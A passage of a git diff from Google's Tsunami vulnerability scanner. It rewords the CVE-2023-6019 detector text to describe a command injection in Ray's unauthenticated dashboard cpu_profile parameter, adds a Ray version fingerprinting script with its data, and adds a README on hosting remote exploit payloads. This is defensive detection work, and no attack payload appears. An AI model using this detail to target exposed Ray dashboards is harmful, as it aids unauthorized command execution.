mockWebResponse(String body) throws IOException { + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(body)); + mockWebServer.start(); + } +} diff --git a/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java b/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java index d354fe38f..409f96499 100644 --- a/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java +++ b/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java @@ -154,9 +154,9 @@ private DetectionReport buildDetectionReport( .addRelatedId( VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6019")) .setDescription( - "An attacker can use the model upload functionality to load remote Linux" - + " commands and gains code execution on the server hosting the ray" - + " application.") + "A command injection exists in Ray's cpu_profile URL parameter allowing" + + " attackers to execute os commands on the system running the ray" + + " dashboard remotely without authentication.") .setRecommendation("Upgrade Ray to version 2.8.0. or later.")) .build(); } diff --git a/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java b/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java index 550c152fc..87d265151 100644 --- a/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java +++ b/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java @@ -66,9 +66,9 @@ public final class Cve20236019DetectorTest { .setTitle("CVE-2023-6019") .addRelatedId(VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6019")) .setDescription( - "An attacker can use the model upload functionality to load remote" - + " Linux commands and gains code execution on the server hosting" - + " the ray application.") + "A command injection exists in Ray's cpu_profile URL parameter allowing" + + " attackers to execute os commands on the system running the ray" + + " dashboard remotely without authentication.") .setRecommendation("Upgrade Ray to version 2.8.0. or later.") .build(); private MockWebServer mockWebServer; diff --git a/google/fingerprinters/web/scripts/updater/community/ray/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/ray/app/docker-compose.yml new file mode 100644 index 000000000..4d59b25c6 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/ray/app/docker-compose.yml @@ -0,0 +1,6 @@ +services: + ray: + image: rayproject/ray:${RAY_VERSION} + ports: + - "8265:8265" + command: sh -c "ray start --head --dashboard-host=0.0.0.0 && tail -f /dev/null" diff --git a/google/fingerprinters/web/scripts/updater/community/ray/update.sh b/google/fingerprinters/web/scripts/updater/community/ray/update.sh new file mode 100755 index 000000000..a82d16fe5 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/ray/update.sh @@ -0,0 +1,97 @@ +#!/usr/bin/env bash + +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of Ray. +RAY_APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/RAY_fingerprints" +# Path to the local git repository for Ray codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +# Read all the versions to be fingerprinted. +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" +mkdir -p "${FINGERPRINTS_PATH}" + +startRay() { + local version="$1" + pushd "${RAY_APP_PATH}" >/dev/null + RAY_VERSION="${version}" docker compose up -d + popd >/dev/null +} + +stopRay() { + local version="$1" + pushd "${RAY_APP_PATH}" >/dev/null + RAY_VERSION="${version}" docker compose down --volumes --remove-orphans + popd >/dev/null +} + +createFingerprintForDashboard() { + local ray_version="$1" + + echo "Fingerprinting Ray version ${ray_version} ..." + # Start a live instance of Ray. + startRay "${ray_version}" + # Arbitrarily chosen so that Ray is up and running. + echo "Waiting for Ray ${ray_version} to be ready ..." + sleep 30 + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "ray-${ray_version}" + + updateFingerprint \ + "ray" \ + "${ray_version}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}/dashboard" \ + "http://localhost:8265" + + # Stop the live instance of Ray. + stopRay "${ray_version}" +} + + +# Convert the existing data file to a human-readable json file. +convertFingerprint \ + "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/ray.binproto" \ + "${JSON_DATA}" + +# Fetch Ray codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/ray-project/ray.git "${GIT_REPO}" +fi + +# Update for all the versions listed in versions.txt file. +for ray_version in "${ALL_VERSIONS[@]}"; do + createFingerprintForDashboard "${ray_version}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Ray. Please commit the following file:" +echo " ${BIN_DATA}" diff --git a/google/fingerprinters/web/scripts/updater/community/ray/versions.txt b/google/fingerprinters/web/scripts/updater/community/ray/versions.txt new file mode 100644 index 000000000..88587e19e --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/ray/versions.txt @@ -0,0 +1,46 @@ +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0 +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0 +1.7.0 +1.7.1 +1.8.0 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.11.0 +1.11.1 +1.12.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.0 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.0 diff --git a/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/ray.binproto b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/ray.binproto new file mode 100644 index 000000000..3c2abb3d8 --- /dev/null +++ b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/ray.binproto @@ -0,0 +1,562 @@ + + +rayC +static/js/2.a5682c7a.chunk.js" + d28a0e14191dfdc62bd98d88c4e49f67F + static/js/main.e42e8231.chunk.js" + 45e6e75ace2bad126a4fee2a68d2242cE +static/css/3.65aa3b33.chunk.css" + 09c2ef992f38929fd605fd6ddce56ec5E +static/css/2.43a1c8b7.chunk.css" + e83f66081f830384222f986d6b007f56E +static/css/2.65aa3b33.chunk.css" + e0cca52d5a8221926e0cf5ed39927572@ +static/js/main.4ff4f4db.js" + 6a9f40e11fcee58a8f21d339d27a961dF + static/js/main.e00916c3.chunk.js" + aa5c26573ae9ecec6f63cb2081b0ea54F + static/js/main.bcaf7740.chunk.js" + 1be1f560a9ce402fa39dfb06c270ab831 + favicon.ico" + 5a4391b3d8ceadc536e6180e79fbb30aC +static/js/2.00747730.chunk.js" + 0a1a6766a3a078d2a114b8b75e5a2e5cF + static/js/main.518a6fb3.chunk.js" + cd3241e7df0d8382642963c56704e2e2E +static/css/6.43a1c8b7.chunk.css" + af770f9017bb84e21c4e57c78fb58ddcC +static/js/6.ba74445f.chunk.js" + a69acf09c252a11caf1dad180e648f6a@ +static/js/main.6e73a04a.js" + cffba61cc134155e5fafd63cffc06d27C +static/js/2.3f5a3866.chunk.js" + 05679525473a886d8cb01359286b3849F + static/js/main.8fe93ca5.chunk.js" + 6115e6c120379fe8224e42bcbfb830c1C +static/js/2.175eea70.chunk.js" + dc0795258b3b3ad7f377e2fa2de472aeF + static/js/main.20b4b076.chunk.js" + 2ddfac558dae265580e9add4a26eb7ee@ +static/js/main.f7757344.js" + f442da85759c08064992a27896e7ca72B +static/css/main.388a904b.css" + 34677307ee64e497878e2af66349ea14H +"static/css/main.d41b9198.chunk.css" + 44dbf61bc622d00207f3924fb30d9f65C +static/js/3.717c3504.chunk.js" + abfeb6d53d453c536ac48fff4a49c7da@ +static/js/main.cc1be436.js" + 0bcde98e6374b20d2f3b09699e088b12@ +static/js/main.27eece88.js" + f4738edee9c349b9a614e444df3f93baF + static/js/main.9dcef677.chunk.js" + deeaeb85939e6a98441e58c4715b4886@ +static/js/main.c1ceb39c.js" + 6b2a909ab5926544f0a837addba8ad95F + static/js/main.74f85e03.chunk.js" + e27bbbafbb310980dc2d8f59113394a6@ +static/js/main.5568d697.js" + d89d7ba7311292e736f3bf7b24aa7c5aH +"static/css/main.209b3f5e.chunk.css" + b8f2831f88f21151b8f34484cf11c740@ +static/js/main.a25f0a80.js" + 90869e062e22e9af9e57234f8a86346cF + static/js/main.4434d995.chunk.js" + 7244527194ae6c98f2ffd8fe4d3315e1@ +static/js/main.f57297a9.js" + ada85a0ffcf01d16aa58f3282cdadd99C +static/js/2.d743aa52.chunk.js" + f9f8332b6912c113fd04511eb39b4459C +static/js/2.a844c442.chunk.js" + 3bffc21d9067ad0961c17bfb8b111435C +static/js/2.c61ca79f.chunk.js" + d4358f1eeef495af2b5bfad5c6809457C +static/js/2.c7ecb373.chunk.js" + e2efe26f2697a614dc5d547fe4c62e54F + static/js/main.9962c005.chunk.js" + 82afc57373da68142a98268190d3e405F + static/js/main.19c0a982.chunk.js" + 3c023655e42aae84e6df41870c015a2f@ +static/js/main.d0f49d93.js" + 744120767bd5d91b31f1d8023ea4e441F + static/js/main.6e5108b7.chunk.js" + 47a43a5c01f5cd030257de22b531b7f0E +static/css/2.47271137.chunk.css" + c236ff5e65bb1259aa25fc1154905f92F + static/js/main.b1101dec.chunk.js" + d945c30d65fad77334caf24bb213396cC +static/js/3.2ce4cb6f.chunk.js" + 617954552c1db5effe5a0ba33ab83d4cF + static/js/main.96d021bc.chunk.js" + 58c578a1b7c75b3a36bf8da2e4ed9599@ +static/js/main.1f147255.js" + af6baa6f124bf22a7b7fb49339f3b122J +" + 3bffc21d9067ad0961c17bfb8b111435 +1.9.1 +1.9.2 +1.10.0 +1.12.1- +" + aa5c26573ae9ecec6f63cb2081b0ea54 +0.8.7. +" + 7244527194ae6c98f2ffd8fe4d3315e1 +1.12.1? +" + e83f66081f830384222f986d6b007f56 +1.7.0 +1.7.1 +1.8.0? +" + 09c2ef992f38929fd605fd6ddce56ec5 +2.0.0 +2.0.1 +2.1.06 +" + 0a1a6766a3a078d2a114b8b75e5a2e5c +1.0.0 +1.0.16 +" + 6b2a909ab5926544f0a837addba8ad95 +2.5.0 +2.5.1H +" + ada85a0ffcf01d16aa58f3282cdadd99 +2.9.0 +2.9.1 +2.9.2 +2.9.3- +" + af6baa6f124bf22a7b7fb49339f3b122 +2.7.0c +" + a69acf09c252a11caf1dad180e648f6a +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0¬ +" + 5a4391b3d8ceadc536e6180e79fbb30a +2.8.0 +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0 +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0 +1.7.0 +1.7.1 +1.8.0 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.06 +" + 2ddfac558dae265580e9add4a26eb7ee +1.7.0 +1.7.1- +" + deeaeb85939e6a98441e58c4715b4886 +1.8.0I +" + 45e6e75ace2bad126a4fee2a68d2242c +1.9.0 +1.9.1 +1.9.2 +1.10.0- +" + 3c023655e42aae84e6df41870c015a2f +1.1.0- +" + 0bcde98e6374b20d2f3b09699e088b12 +2.2.0. +" + f442da85759c08064992a27896e7ca72 +2.10.0- +" + d945c30d65fad77334caf24bb213396c +1.3.08 +" + 58c578a1b7c75b3a36bf8da2e4ed9599 +1.13.0 +1.13.1- +" + 744120767bd5d91b31f1d8023ea4e441 +2.4.0- +" + cffba61cc134155e5fafd63cffc06d27 +2.8.0- +" + cd3241e7df0d8382642963c56704e2e2 +1.2.0? +" + 6a9f40e11fcee58a8f21d339d27a961d +2.6.0 +2.6.1 +2.6.26 +" + 617954552c1db5effe5a0ba33ab83d4c +2.0.0 +2.0.18 +" + e2efe26f2697a614dc5d547fe4c62e54 +1.13.0 +1.13.1g +" + e0cca52d5a8221926e0cf5ed39927572 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.16 +" + d28a0e14191dfdc62bd98d88c4e49f67 +1.7.0 +1.7.1- +" + 6115e6c120379fe8224e42bcbfb830c1 +1.0.0‚ +" + b8f2831f88f21151b8f34484cf11c740 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0Q +" + c236ff5e65bb1259aa25fc1154905f92 +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0- +" + d4358f1eeef495af2b5bfad5c6809457 +1.8.0- +" + 90869e062e22e9af9e57234f8a86346c +2.7.1? +" + 44dbf61bc622d00207f3924fb30d9f65 +1.7.0 +1.7.1 +1.8.0- +" + 05679525473a886d8cb01359286b3849 +1.9.0c +" + af770f9017bb84e21c4e57c78fb58ddc +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.06 +" + f4738edee9c349b9a614e444df3f93ba +2.3.0 +2.3.1- +" + 47a43a5c01f5cd030257de22b531b7f0 +1.0.1- +" + abfeb6d53d453c536ac48fff4a49c7da +2.1.0Ç +" + 34677307ee64e497878e2af66349ea14 +2.8.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.06 +" + dc0795258b3b3ad7f377e2fa2de472ae +1.1.0 +1.2.0- +" + d89d7ba7311292e736f3bf7b24aa7c5a +2.8.1- +" + f9f8332b6912c113fd04511eb39b4459 +0.8.76 +" + 1be1f560a9ce402fa39dfb06c270ab83 +2.0.0 +2.0.1Z +" + e27bbbafbb310980dc2d8f59113394a6 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0- +" + 82afc57373da68142a98268190d3e405 +2.1.0"1 +static/js/2.a5682c7a.chunk.js +1.7.0 +1.7.1"G + static/js/main.e42e8231.chunk.js +1.9.0 +1.9.1 +1.9.2 +1.10.0"< +static/css/3.65aa3b33.chunk.css +2.0.0 +2.0.1 +2.1.0"< +static/css/2.43a1c8b7.chunk.css +1.7.0 +1.7.1 +1.8.0"d +static/css/2.65aa3b33.chunk.css +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1"7 +static/js/main.4ff4f4db.js +2.6.0 +2.6.1 +2.6.2"+ + static/js/main.e00916c3.chunk.js +0.8.7"4 + static/js/main.bcaf7740.chunk.js +2.0.0 +2.0.1"• + favicon.ico +2.8.0 +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0 +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0 +1.7.0 +1.7.1 +1.8.0 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.0"1 +static/js/2.00747730.chunk.js +1.0.0 +1.0.1"+ + static/js/main.518a6fb3.chunk.js +1.2.0"` +static/css/6.43a1c8b7.chunk.css +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0"^ +static/js/6.ba74445f.chunk.js +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0"% +static/js/main.6e73a04a.js +2.8.0"( +static/js/2.3f5a3866.chunk.js +1.9.0"+ + static/js/main.8fe93ca5.chunk.js +1.0.0"1 +static/js/2.175eea70.chunk.js +1.1.0 +1.2.0"4 + static/js/main.20b4b076.chunk.js +1.7.0 +1.7.1"& +static/js/main.f7757344.js +2.10.0"Á +static/css/main.388a904b.css +2.8.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.0"? +"static/css/main.d41b9198.chunk.css +1.7.0 +1.7.1 +1.8.0"( +static/js/3.717c3504.chunk.js +2.1.0"% +static/js/main.cc1be436.js +2.2.0". +static/js/main.27eece88.js +2.3.0 +2.3.1"+ + static/js/main.9dcef677.chunk.js +1.8.0". +static/js/main.c1ceb39c.js +2.5.0 +2.5.1"X + static/js/main.74f85e03.chunk.js +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0"% +static/js/main.5568d697.js +2.8.1"‚ +"static/css/main.209b3f5e.chunk.css +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0"% +static/js/main.a25f0a80.js +2.7.1", + static/js/main.4434d995.chunk.js +1.12.1"@ +static/js/main.f57297a9.js +2.9.0 +2.9.1 +2.9.2 +2.9.3"( +static/js/2.d743aa52.chunk.js +0.8.7"E +static/js/2.a844c442.chunk.js +1.9.1 +1.9.2 +1.10.0 +1.12.1"( +static/js/2.c61ca79f.chunk.js +1.8.0"3 +static/js/2.c7ecb373.chunk.js +1.13.0 +1.13.1"+ + static/js/main.9962c005.chunk.js +2.1.0"+ + static/js/main.19c0a982.chunk.js +1.1.0"% +static/js/main.d0f49d93.js +2.4.0"+ + static/js/main.6e5108b7.chunk.js +1.0.1"N +static/css/2.47271137.chunk.css +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0"+ + static/js/main.b1101dec.chunk.js +1.3.0"1 +static/js/3.2ce4cb6f.chunk.js +2.0.0 +2.0.1"6 + static/js/main.96d021bc.chunk.js +1.13.0 +1.13.1"% +static/js/main.1f147255.js +2.7.0 \ No newline at end of file diff --git a/payloads/README.md b/payloads/README.md new file mode 100644 index 000000000..7d1571c8b --- /dev/null +++ b/payloads/README.md @@ -0,0 +1,13 @@ +# Tsunami Remote Payloads + +If a Tsunami plugin require payloads to be served remotely, you can add them in +this folder. + +When adding a new payload, please make sure: + +1. Add a dedicated folder for the payload +2. Include the source code for the binary payload for debuggability in the future. + +The long-term plan is to serve these payloads on the Tsunami callback server, so +that we can do callback verification on top of triggering exploits and keep the +serving url short.